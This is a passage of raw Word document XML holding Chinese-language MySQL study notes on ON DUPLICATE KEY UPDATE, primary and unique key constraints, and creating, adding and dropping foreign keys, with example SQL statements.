    <w:p w14:paraId="45FF1828" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664E7DDC" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRPr="00EF6410" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF6410">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>INSERT INTO table_name (uuid, purl, ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F5E20" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRPr="00EF6410" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF6410">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>VALUES (?, ?, ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560ADF78" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRPr="00EF6410" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF6410">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ON DUPLICATE KEY UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2BE385" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF6410">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>purl=VALUES(purl), ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C458DC" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0791A6FF" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> uuid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经存在，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> purl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（以及你在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UPDATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分指定的任何其他列）就会被更新。如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> uuid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不存在，那么新数据就会被插入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C04B84" w14:textId="77777777" w:rsidR="00273BE2" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB8FF41" w14:textId="611E0C36" w:rsidR="00A0611F" w:rsidRDefault="00273BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ON DUPLICATE KEY UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仍然会根据所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIQUE KEY </w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B644F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRIMARY KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检查冲突。但是，你可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UPDATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分指定哪些列应该被更新，从而在一定程度上控制更新的行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7380F4" w14:textId="77777777" w:rsidR="00A0611F" w:rsidRDefault="00A0611F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672349A7" w14:textId="77777777" w:rsidR="00A0611F" w:rsidRDefault="00A0611F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18739E9B" w14:textId="77777777" w:rsidR="00A0611F" w:rsidRDefault="00A0611F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC79836" w14:textId="77777777" w:rsidR="00A0611F" w:rsidRPr="00A0611F" w:rsidRDefault="00A0611F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7553B4C1" w14:textId="274A3C29" w:rsidR="00BA54C4" w:rsidRDefault="00BA54C4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F2C809" w14:textId="77777777" w:rsidR="00BA54C4" w:rsidRPr="008435AA" w:rsidRDefault="00BA54C4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1334E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc159779531"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>约束：主键、唯一性约束的键</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="34E0F674" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>主键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PRIMARY KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来直接描述这个键</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355BA1FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>唯一性约束的键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UNIQUE KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来描述这个键，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`uni_age` (`age`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面是描述这个键被备注为什么键名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17629605" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>CREATE TABLE `test1` (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C220440" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`id` int(11) NOT NULL AUTO_INCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0009DB34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `age` int(11) DEFAULT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152B061A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PRIMARY KEY (`id`),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E95CD5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>UNIQUE KEY `uni_age` (`age`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F45FF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>) ENGINE=InnoDB  DEFAULT CHARSET=utf8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11116B2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64499A40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc159779532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>外键</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="76AF8195" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外键的大概意思就是，在当前表中新增一个列，这个列是其他表的主键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460B2664" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CCAE82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:t>http://c.biancheng.net/view/2441.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F8573" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BF468D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysql&gt; CREATE TABLE tb_emp6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5902446C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -&gt; (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4707BBB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -&gt; id INT(11) PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB995E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -&gt; name VARCHAR(25),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B895C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -&gt; deptId INT(11),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44562152" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -&gt; salary FLOAT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37492B92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    -&gt; CONSTRAINT fk_emp_dept1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D194ABF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    -&gt; FOREIGN KEY(deptId) REFERENCES tb_dept1(id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E553889" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -&gt; );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666AD9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>创建数据表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tb_emp6</w:t>
      </w:r>
      <w:r>
        <w:t>，并在表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tb_emp6 </w:t>
      </w:r>
      <w:r>
        <w:t>上创建外键约束，让它的键</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deptId </w:t>
      </w:r>
      <w:r>
        <w:t>作为外键关联到表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tb_dept1 </w:t>
      </w:r>
      <w:r>
        <w:t>的主键</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:t>语句和运行结果如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F7C09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE645DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>以上语句执行成功之后，在表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tb_emp6 </w:t>
      </w:r>
      <w:r>
        <w:t>上添加了名称为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fk_emp_dept1 </w:t>
      </w:r>
      <w:r>
        <w:t>的外键约束，外键名称为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deptId</w:t>
      </w:r>
      <w:r>
        <w:t>，其依赖于表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tb_dept1 </w:t>
      </w:r>
      <w:r>
        <w:t>的主键</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33129B48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>注意：从表的外键关联的必须是主表的主键，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>且主键和外键的数据类型必须一致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。例如，两者都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> INT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>类型，或者都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> CHAR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>类型。如果不满足这样的要求，在创建从表时，就会出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>“ERROR 1005(HY000): Can't create table”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBDFE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D28F349" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc159779533"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改表新增外键：增和删</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="570A200B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ALTER TABLE &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数据表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt; ADD CONSTRAINT &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>外键名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FOREIGN KEY(&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;) REFERENCES &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>主表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt; (&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C2ED2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>当一个表中不需要外键约束时，就需要从表中将其删除。外键一旦删除，就会解除主表和从表间的关联关系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D0C8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>删除外键约束的语法格式如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A774407" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ALTER TABLE &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt; DROP FOREIGN KEY &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>外键约束名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C79B355" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E1A834" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>定义外键时，需要遵守下列规则：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FEDB69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>主表必须已经存在于数据库中，或者是当前正在创建的表。如果是后一种情况，则主表与从表是同一个表，这样的表称为自参照表，这种结构称为自参照完整性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7634232F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>必须为主表定义主键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4936AC53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>主键不能包含空值，但允许在外键中出现空值。也就是说，只要外键的每个非空值出现在指定的主键中，这个外键的内容就是正确的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DB582" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在主表的表名后面指定列名或列名的组合。这个列或列的组合必须是主表的主键或候选键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA90F65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>外键中列的数目必须和主表的主键中列的数目相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C0875C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
